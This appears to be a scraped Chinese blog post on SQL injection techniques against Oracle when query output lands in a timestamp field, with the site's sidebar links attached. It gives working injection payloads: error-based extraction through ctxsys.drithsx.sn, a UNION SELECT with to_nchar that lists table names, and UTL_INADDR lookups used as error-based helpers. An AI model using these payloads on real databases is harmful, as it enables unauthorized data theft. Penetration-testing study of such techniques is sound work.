当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
猜你喜欢
vulhub靶场学习日记hackme1
uni-app进阶之自定义【day13】
uni-app进阶之样式框架/生产环境【day10】
07 【内置指令 自定义指令】
gin框架学习-Casbin进阶之策略管理API使用方法
leetcode-每日一题873. 最长的斐波那契子序列的长度(哈希和二分)
【数据库学习】Redis 解析器&&单线程&&模型
If the account number or password is entered incorrectly for many times, the account will be banned.
With MVC, why DDD?
Sword Point Offer Special Assault Edition ---- Day 1
随机推荐
Redis first meeting
剑指offer基础版 ---- 第26天
find、filter、map的区别
联盟链的真实场景在哪里
uni-app进阶之生命周期【day8】
tf.keras.utils.get_file()
C语言文件读、写、定位函数
闭包(四)----IIFE
Three-party login using wallet Metamask based on web3.0
Redis Advanced - Cache Issues: Consistency, Penetration, Penetration, Avalanche, Pollution, etc.
The interviewer asked me TCP three handshake and four wave, I really
Volatility取证工具使用日记
leetcode-每日一题1252. 奇数值单元格的数目(模拟优化)
剑指offer专项突击版 --- 第 4 天
C语言教程(一)-准备
剑指offer基础版 ----- 第28天
The interviewer asked me how to divide the database and the table?Fortunately, I summed up a set of eight-part essays
变量的解构赋值
剑指offer基础版 ----第31天
剑指offer基础版 ----- 第25天